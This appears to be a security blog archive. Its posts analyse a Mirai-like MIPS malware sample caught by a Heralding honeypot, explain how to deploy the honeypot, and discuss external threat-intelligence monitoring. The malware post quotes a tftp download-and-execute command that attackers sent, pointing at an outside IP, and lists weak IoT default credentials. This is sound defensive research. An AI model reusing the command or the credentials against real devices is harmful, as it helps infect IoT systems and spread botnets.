In a previous post, I discussed some of my experiences with heralding, a credential grabbing honeypot. In this post, I will briefly analyze a sample I obtained from tftp’ing a sample based on heralding log entries. This sample appears to be targetted at MIPS based systems installs that use very weak default creds (root:5up, Admin:5up). There are a few devices that I could find that uses these creds. There are likely many more.
In my previous post I mentioned that I was not able to download a sample from the tftp commands. Well today, I was finally able to download one of the samples via tftp without it timing out.
According to 3 AVs on Virustotal, 3f3863996071b4f32ca8f8e1bfe27a45 is Mirai, BUT the IPs performing the telnet scans only attempted 2 username/password combinations (and the Mirai source code uses many more so this may be a new variant or something completely different).
Here are the IPs observed trying to get my honeypot to download and execute this specific sample (via “tftp -l 7up -r 7up -g 126.96.36.199”).
Switch back to the tcpdump terminal, and kill it. Also, and this is very important, kill the “qemu-mips 7up” processes. The 7up sample immediately starts scanning port 23 at a high rate so you don’t want it running very long.
As you can see from the pcap, we were able to extracted a couple of IOCs:
Privacy protected so kind of a dead end.
Not privacy protected and linked with some Mirai activity (see below). Also of note is the Registrant City which is “fastflux”, kind of funny.
Searching for the registrant email, dlinchkravitz[@]gmail[.]com, turns up these blog posts:
In this post, I am just outlining some details from trying out a relatively new honeypot named Heralding, developed by the well known Honeynet Project developer, Johnny Vestergaard.
Heralding is a designed to simply catch login attempts over several different protocols and subsequent activities. It supports the following protocols:
Heralding logs its data as CSV when logged to files or JSON if logged via ZMQ.
Each record contains the following fields:
Local CSV file
JSON over ZMQ
This is my recommended installation steps. I usually use python virtualenv in order to keep the install isolated from the rest of my environment.
Running this command will allow you to run the honeypot and test the config you just created (config is loaded from current working directory or it uses the default config).
You should see output like this:
When deploying honeypots, I prefer to use supervisord to manage the auto starting/stopping/restarting the sensor upon reboots and failures. So here is how I have deployed heralding:
Check the status:
I ran just one instance of heralding for ~10 hours and caught 3077 events (mostly login attempts), all over telnet. My raw log file can be downloaded here. Here are some stats about what this sensor saw.
After reviewing the logs closer, it appears that all of the “enable” and “shell” usernames and “system” and “sh” passwords are not username/passwords, but instead, they are commands that are attempted after the attacker attempts to login with one of the following sets of creds. These are well known IoT default creds and most of them are embedded in the Mirai scanner source code.
Another IoT related pattern I observed was what appear to be busybox default creds being used to login, download a payload via tftp, and execute it. Unfortunately, I have not be able to download any of the payload files yet, they all timeout.
Malicious login attempts are very common, esp with IoT devices shipping with hardcoded credentials. Heralding makes collecting these login attempts easy since it is a simple, but effective honeypot for capturing credentials attempted over a variety of different protocols.
Heralding is implemented in python and because of its modular logger design, it would be relatively straightforward to add MHN support for this honeypot, so if time permits I might do this.
If you wanted to explore the data collected by my instance of heralding, you can download my log file here: here.
Lastly, consider donating to the Honeynet Project:
Borderless Threat Intelligence - using External Threat Intelligence for Brand and Supply Chain Monitoring
This past year was the year of the data breach. Large and small organizations across every industry vertical were impacted by compromises that ranged from theft of PII, intellectual property, and financial information to publication of entire backend databases and email spools.
The data from these breaches often wound up being exposed publicly, exchanged or sold on underground markets, or simply leveraged to breach other organizations.
Many of these breaches have cascading effects due to the transitive nature of security that exists across companies, as the rely on critical business partners, subsidiaries and other organizations whose services are trusted.
Additionally, password reuse across customer accounts involved in a third-party data dump could enable unauthorized access to another business’ assets.
Threat intelligence can be used to gain visibility and combat some of these issues. External threat intelligence can be leveraged to use information about events not occurring on your own network in order to detect breaches or threats to your brand or supply chains. Below are some specific items that can help:
Suspicious Domain Name Monitoring
Adversaries are increasingly acquiring domain names that resemble either a company they want to target or a brand they want to leverage to social engineer victims. Registering typo squatted domains and homoglyph domains is not new and there are some great open source tools, such as urlcrazy and dnstwist, to do this.
However, many organizations are not monitoring for the presence of these domains in their environment or the registrations of these domains as they occur.
Adversaries often use the following techniques when acquiring these domains – here are some examples techniques applied to the domain “threatstream.com”:
Keyboard Typo – threststream.com
Character omission – theatstream.com, threatsteam.com
Character insertion – threattstream.com, threatsstream.com
Homoglyph – threatstrearn.com, threatstreann.com
Character Swap – threatstraem.com
Missing dot or replacing dot with dash – wwwthreatstream.com, www-threatstream.com, http-www-threatstream.com, threatstreamcom.us
Different TLD – threatstream.us, threatstream.co, threatstreamc.om
Mass Credential Exposures
Increasingly, script kids, hacktivists and cyber criminals are dumping huge collections of usernames and passwords publicly on the dark web or for sale on underground marketplaces. Often times, these dumps contain corporate email addresses and passwords that were found when a third-party website was compromised through SQL injection or other weaknesses.
Because password reuse is so rampant and many organizations still don’t use Multi-Factor Authentication (MFA), these exposures can put you at risk. Monitoring for mass credential exposures affecting your company or any supply chain company you depend on is very useful for reducing these risks.
Network Cleanliness Monitoring
Are IPs from the network space you own/control showing up on threat feeds of machines that are scanning, brute forcing, DDoS-ing, sending spam, connecting to DNS sinkholes, or hosting malicious content?
What about the IPs of your executive’s home networks? Or the IPs of your critical supply chain or business partners?
If so, you may have a compromised system that you were unaware of and it may put your company at risk. Monitoring threat intelligence feeds for these items can give you a warning that something is not right so action can be taken.
Have you checked what sites like Shodan, ZoomEye, and Censys have about your networks or your critical supply chains’ networks? Are there vulnerable or unexpected services running? These sites’ data is public so anyone, including malicious actors, can and do review it – so should you.
Network cleanliness monitoring can take many shapes from monitoring threat intelligence feeds to querying public portscan/web crawl repositories to actually running the network scans yourself but the goals are to identify systems and services that are either vulnerable, unexpected, or compromised.
Signs of Targeting and Social Networking Data-mining
Are you or your supply chain being discussed as a target on social media or the DarkWeb? Have any public threats been made? Is there malicious software purpose-built to target your company or your supply chain?
Monitoring what is being shared and discussed on both social media and the DarkWeb forums as it pertains to your company can provide an an early warning before an attack is carried out.
Credential Exposure Posting from the Hell Darkweb forum
The first step for operationalizing these concepts is building an inventory of yourself and your critical supply partners. The following information should be collected and kept up-to-date:
Email domains names
Internal and external domain names, especially for sensitive resources
Company’s IP address space
Personal email addresses of key executives
IP address space of key executives’ home networks
Names of key executives
The next step is identifying data sources that you have or that you can acquire that provide the visibility you want. These data source should include:
Internal DNS logs, web proxy logs
Threat Intelligence feeds
Malware C2 Sinkhole data
Portscan/web crawl data
Paste sites (e.g. pastebin and others)
Social media sites
The final step is setting up collection and processing of the different data sources to look for instances of items from your inventory showing up. Security Information and Event Management (SIEM) or log management platforms are often useful places to perform these actions.
If you don’t have one of these, simple scripts that grep the data may be sufficient (it really depends on the size of your network and the volume of data). There are commercial services that can provide this, as well.
If you would like to learn more about these concepts and how to operationalize them, please check out the presentation I gave at the 2016 R-CISC Retail Summit below.
Over the past several years I have collected and read many security research papers/slides and have started a small catalog of sorts. The topics of these papers range from intrusion detection, anomaly detection, machine learning/data mining, Internet scale data collection, malware analysis, and intrusion/breach reports. I figured this collection might useful to others. All links lead to PDFs hosted here.
I hope to clean this up (add author info, date, and publication) when I get some more time as well as adding some detailed notes I have on the various features, models, algorithms, and datasets used in many of these papers.
Here are some of my favorites (nice uses of machine learning, graph analytics, and/or anomaly detection to solve interesting security problems):